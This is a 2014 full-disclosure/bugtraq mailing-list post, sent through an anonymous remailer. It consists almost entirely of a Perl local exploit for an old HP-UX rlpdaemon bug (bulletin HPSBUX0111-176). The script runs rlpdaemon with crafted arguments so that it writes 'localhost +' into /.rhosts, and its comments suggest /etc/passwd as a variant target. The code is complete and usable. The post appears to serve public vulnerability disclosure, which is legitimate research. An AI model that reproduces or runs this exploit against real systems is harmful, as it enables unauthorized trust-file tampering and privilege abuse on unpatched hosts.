[<prev] [next>] [day] [month] [year] [list]
Message-ID: <93036929ad62ab0d2cafff2a2ede78fb@dizum.com>
Date: Sun, 16 Mar 2014 02:20:01 +0100 (CET)
From: Nomen Nescio <nobody@...um.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: exploit for old rlpdaemon bug
#!/opt/perl5/bin/perl -w
# HP-UX rlpdaemon local exploit
# Bulletin HPSBUX0111-176 (November 2001)
#
# For use only on machines where you have legitimate root.
# This attempts to add junk (including "localhost +") to /.rhosts.
# Obvious variants could include /etc/passwd.
use IO::Socket;
$PORT = 9000; # pick something not in use
$pid=fork;
die("fork: $!") unless (defined($pid));
if (0 == $pid) {
# child - server, exec rlpdaemon with chosen argv
$IPPROTO_TCP=6;
$SOCK_STREAM=1;
$AF_INET=2;
$PF_INET=2;
$sockaddr='S n a4 x8'; # packed socket data
$this=pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");
socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die ("socket: $!");
bind(S, $this) or die("bind: $!");
listen(S, 5) or die("listen: $!");
$addr=accept(NS, S);
# dup2 on 3 standard streams
open(STDIN, "+<&NS") or die("dup2: $!");
open(STDOUT, "+>&NS") or die("dup2: $!");
open(STDERR, "+>&NS") or die("dup2: $!");
exec {"/usr/sbin/rlpdaemon"}
"\nlocalhost +\n",
"-i", "-l", "-L", "/.rhosts";
# UNREACHED
exit(1);
}
sleep 5; # let server start before we connect to it
# parent - connect to server with loggable action
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "localhost",
PeerPort => $PORT
)
or die "cannot connect to port $PORT at localhost";
# RFC1179
printf($remote "%clp\n", 2); # rlpdaemon should log this
close($remote);
exit(0);
Powered by blists - more mailing lists